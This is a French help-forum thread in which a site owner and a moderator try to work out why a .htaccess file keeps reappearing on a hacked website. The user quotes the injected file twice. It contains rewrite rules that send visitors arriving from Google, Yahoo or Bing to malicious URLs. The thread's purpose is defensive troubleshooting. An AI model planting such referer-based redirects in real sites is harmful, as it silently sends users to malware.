Problème avec un fichier htaccess bizarre

Fermé
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010 - 14 févr. 2010 à 11:32
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 - 24 févr. 2010 à 11:38
Bonjour,

Voilà. J'ai un petit problème sur mon site. Je me suis aperçu que certains résultats de recherche Google sur mon site pointaient vers un site malveillant.

Je ne suis pas du tout "calé" dans ce domaine, mais après un bref parcours de mon répertoire distant, je me suis aperçu que plusieurs fichiers .php étaient insérés dans mes pages. Soupçonnant une usurpation de mes identifiants ftp, j'ai donc demandé à mon hébergeur de changer ces identifiants. Le service technique me répond que mon ordinateur est surement infecté et qu'il faut faire les changement d'identifiants après avoir procédé à l'analyse de mon système via un anti-virus en ligne.
Soit. J'ai donc suivi ce conseil.

J'ai donc fait la vérification de mon système par un anti-virus en ligne. Après balayage minutieux de l'ensemble de mon système, l'analyse a effectivement révélé 4 fichiers infectés. (que mon anti-virus local n'avait jamais vu)
J'ai donc procédé à la désinfection, et ai relancé dans la foulée une 2ème analyse. Pas de problème, il n'y a plus de virus dans mon système.

Sauf que mon problème persiste toujours, mais cette fois j'ai plus de précisions. A savoir que certains résultats "google" (et uniquement lorsqu'on passe par le moteur de recherche, car si l'adresse est tapée directement dans la barre, ça marche bien) pointent parfois vers une page que mon anti-virus bloque car il me signale une menace.

Lorsque cela m'arrive, je vais dans mon éditeur ftp (filezilla) et là, dans le dossier racine (du répertoire distant), il y a un fichier qui n'a rien à faire là, qui est nommé .htaccess. Dès que je supprime ce fichier, tout va bien, les résultats dans google redeviennent parfaitement normaux. Et moi, je n'y comprend rien !

Je retourne tous les jours dans filezilla pour vérifier le contenu de mon site et tous les jours ou presque, je suis obligé de supprimer cet étrange fichier.

Est-ce que quelqu'un peut m'éclairer ????

Merci.
Cordialement
Serge
A voir également:

31 réponses

bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 11:54
Je me suis aperçu que certains résultats de recherche Google sur mon site pointaient vers un site malveillant. 

dans ce cas cela vient à 99% de script intégrés dans tes pages, donc scan ou pas tu ne trouveras rien ....
il faut voir de où ça sort et les supprimer ...
0
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010
14 févr. 2010 à 12:18
il faut voir de où ça sort et les supprimer ...

OK, mais je fais comment ? Je m'excuse mais je ne suis pas très calé, j'ai fait mon site tout seul (www.serge-ollive.com) et là, ça dépasse mon domaine de compétences (qui n'est déjà pas très étendu :-)))
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 15:09
tu as un site qui a déjà un PR de 3 et 1050 pages environ sur google ... comment veux-tu que l'on trouve le hic ?
"tu t'es aperçu..." en faisant quelles recherches, sur quels mots clés ....
pas à partir de " La grange à Pisancon" quand même .... :)
0
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010
14 févr. 2010 à 15:21
En fait il suffit de faire n'importe quelle recherche qui fait apparaitre des résultats vers mon site. Peut importe la recherche et peu importe les résultats, il suffit qu'ils indiquent le site serge-ollive.com.

Mais ça ne le fait pas tout le temps et sur tous les résultats, c'est très aléatoire. Parfois le résultat google pointant vers la page d'accueil va marcher, alors que celui pointant vers la page "biographie" va diriger en réalité vers un virus. Et parfois c'est l'inverse...!

Mais dans tous les cas, je répète : Dès qu'il y a le moindre problème, c'est que mon rpertoire distant contient à tous les coups ce fichier .htaccess. Lorsque je supprime ce fichier, TOUS les résultats Google pointent vers mon site, sans aucun problème.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 15:53
c'est que mon rpertoire distant contient à tous les coups ce fichier .htaccess

il contient quoi ce fichier, peux-tu mettre le code ici ?
et je viens de cliquer sur un lien qui dirige vers "biographie.html" il n'y a absolument rien de bizarre ...
0
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010
14 févr. 2010 à 16:01
il contient quoi ce fichier, peux-tu mettre le code ici ?

Alors là, j'en sais rien. Pour savoir il faudrait qu'il apparaisse à nouveau dans mon répertoire. Depuis ce matin (dernière fois que je l'ai supprimé), il n'est plus ré-apparu.

et je viens de cliquer sur un lien qui dirige vers "biographie.html" il n'y a absolument rien de bizarre ...
Oui, forcément, puisque j'ai supprimé ce .htaccess ce matin, et que lorsque je le supprime tout redevient normal. Pour le moment, mon site est donc accessible depuis goggle, sur toutes les pages....jusqu'à ce que ce fichier revienne.
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 16:04
jamais vu un tel fichier qui se régénère tout seul !!!
si c'est vraiment le cas, mets-en un (totalement vide) toi-même à la racine du site ... normalement il ne devrait pas être écrasé ...
0
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010
14 févr. 2010 à 16:09
Jamais vu un tel fichier qui se régénère tout seul !!!

Bizarre, hein ?

mets-en un (totalement vide) toi-même à la racine du site ... normalement il ne devrait pas être écrasé ...

OK. Je fais comment ? (vraiment désolé pour mon manque de connaissance... :-(
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 16:16
tu envoies un fichier htaccess.txt (bloc notes de windows) totalement vierge à la racine de ton site
et ensuite tu le renomme dans ton espace distant en .htaccess ... hop !
0
serge5 Messages postés 6 Date d'inscription dimanche 14 février 2010 Statut Membre Dernière intervention 14 février 2010
14 févr. 2010 à 16:23
Ok, je vais essayer ça, et surveiller que l'autre ne revienne pas. Ce sera à priori, rapide à vérifier puisque il revient tous les jours ou presque.

MERCI !
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
14 févr. 2010 à 17:34
ok @+
0
Salut !

Eh ben voilà ! IL EST DE RETOUR !
J'ai fait ce que tu m'a dit et pendant 2 -3 jours le fichier .htaccess "vide" a bien remplacé l'autre...jusqu'à maintenant.
Pour voir, c'est simple, je l'ai pas encore supprimé du répertoire distant : dans Google, fais une recherche "serge ollive" , le premier résultat mène normalement sur la page d'accueil de mon site, sauf que là, comme ce fichier est de nouveau là, ça coince.

J'ai relevé aussi le code, ça peut servir :

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteRule .* http://hotelturismogoya.com.ar/imgs/go.php [R,L]

Attention, l'URL désigné en "redirection" est un site malveillant, bien sûr.

Je ne sais plus quoi faire. J'ai beau supprimer ce fichier de mon site distant (il n'est pas en local) il revient sans arrêt, tout seul !
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
18 févr. 2010 à 17:10
ben voilà :
https://transparencyreport.google.com/safe-browsing/search?url=http://hotelturismogoya.com.ar/imgs/go.php&hl=fr
il est là:
https://www.google.fr/search?q=hotelturismogoya.com.ar&ie=utf-8&oe=utf-8&aq=t&client=firefox-a&rlz=1R1GGGL_fr&gws_rd=ssl
donc à moins que tu ne sache de où ça peut provenir, il ne te reste plus qu'à rapatrier tout ton site en local et chercher dans les pages un script qui doit y être et génère ce fichier ... script qui est certainement lié à un lien ou pub que tu aurais mis ...
une fois éliminé, tout effacer sur le serveur et tout remettre ensuite ...
bon courage ...
car tu as pas mal de pages concernées et faut faire assez vite avant de te faire repérer par les moteurs ...
0
Ok, je vais chercher... galère...

MERCI, je te tiens au courant.

A+
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
18 févr. 2010 à 17:38
si tu ne sais pas exactement où est ce script,
en local (bien protégé !) et tout chercher ....
vraie salo..... ce truc, tu as du te servir d'un lien, d'un script ou autre ... ??
0
A priori, je vois pas, j'ai passé en revue les pages où il peut y avoir des liens. Rien d'anormal à première vue.
Comment ça pourrait se présenter ?
0
serge5 > serge5
18 févr. 2010 à 18:21
HOP !!! je crois que j'ai trouvé. Si c'est bien des scripts qu'il fallait chercher, eh bien il y en avait deux parmi les pages de mon répertoire local. (je me demande comment j'ai fait pour pas les voir) :
- AC_ActiveX et AC_RunActiveContent, créés le 3 décembre 2009. Je sais pas comment ces fichiers sont arrivés là....
Bon, j'ai tout viré, et je viens de tout re-balancer de local à distant.

J'attend de voir, pourvu que ce soit ça...

Merci à toi.
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
18 févr. 2010 à 18:20
dans l'urgence:
https://longuetraine.fr/?article280/verifier-la-securite-d-un-site-son-certificat
https://longuetraine.fr/?article392/comment-trouver-un-script-malveillant-sur-un-site-web-la-sanction-malware-warning
inscris-toi alors sur norton safe web et demande une analyse ... les résultats sont assez longs à venir mais ça pourra te re-servir ....
là je ne peux rien faire tu n'as plus aucune page accessible, elles sont toutes redirigées ....
- tu re-supprimes ton fichier, tu en remets un vierge à la place et tu mets dessus un chmod à 400 ..;ça évitera ... peut-être le retour
soit tu as un fichier qui contient un virus
soit tu en as un qui contient un script qui te crée ça ...
0
Voilà, j'ai fait ce que tu m'as dit.
J'ai donc recréé un .htaccess vierge, que j'ai balancé à la racine du site. (par contre le chmod, si je met 400, le site devient inaccessible. Ce serait pas 444 ?)

Et j'ai demandé l'analyse du site sur norton safe web.

Merci
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
18 févr. 2010 à 19:38
laisse en 444 alors ... ;)
quand tu auras l'analyse de norton, envoies le lien ...
0
Salut,

bon pour le moment Norton n'a pas encore analysé le site.
En revanche, et ce malgré tout ce que j'ai pu aire jusqu'à présent, y compris les dernières manips, le ichier .htaccess continue de revenir.

Je recherche depuis des jours des balises scripts dans mes pages de codes, en vain. Je ne trouve absolument rien.
J'ai donc essayé d'enlever toutes les pages de mon site du répertoire distant (en ne laissant juste que les photos, Mp3, PDF... tout ce qui n'était pas des pages html). Au bout de quelques heures, le fichier .htaccess est revenu...exactement comme d'habitude.

Je me demande finalement s'il s'agit bien d'un script dans mes pages. Puisqu'elles n'y étaient pas, elles n'ont pas pu générer ce fichier à priori.
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
23 févr. 2010 à 15:07
si tu vires tout de ton espace en ligne, c'est " TOUT " de manière à savoir qu'il n'y reste plus rien de rien, ensuite en regardant tes pages en local, vires ce qui semble ne pas te servir, scripts, js, etc ...
0
Bon, cette fois, j'ai TOUT viré. il n'y a plus rien du tout dans le répertoire distant.
En local, j'ai déjà parcouru mes pages plus d'une fois, et j'ai viré des balises scripts suspectes et tout ce qui n'avait a priori rien à faire là. Maintenant, il n'y a plus rien. En tout cas, rien de visible.

On va attendre que le .htaccess revienne. Là si il revient avec rien dans le site, je sais pas d'où il arrive...
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
23 févr. 2010 à 15:45
Là si il revient avec rien dans le site, je sais pas d'où il arrive...

et moi non plus alors ... si cela devait arriver il te faudrait le signaler à l'hébergeur, mais là ça risque de prendre un p'tit bout de temps, je ne sais pas s''ils sont très réactifs dans ce cas là ...
0
Ben voilà ! quand on parle du loup.... ça parait incroyable, mais IL EST DE RETOUR ! :-)
Donc, là, je suppose qu'il est impossible que ça vienne de mon site, non ? (ou alors faut m'expliquer).

Bon voilà le code :

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteRule .* http://188.124.9.67/a/go.php [R,L]

Mon hébergeur ? Ben eux, je leur ai signalé ça depuis un moment. Ils ne veulent pas changer mes identifiants, ils soutiennent que c'est mon PC qui est infecté.

(Pour ajouter encore une analyse, j'ai fait vérifier le PC ce matin par un anti-spyware, lequel a trouvé des cookies traceurs qu'il me conseillait de supprimer. Chose faite, mais depuis, le .htaccess a eu le temps de revenir quelques fois. Donc, c'est pas ça non plus...
0
bg62 Messages postés 23664 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 17 décembre 2024 2 392
23 févr. 2010 à 16:17
??? il est où ce fichier .htaccess maintenant ...
pas en ligne quand même, sur ton DD ?
0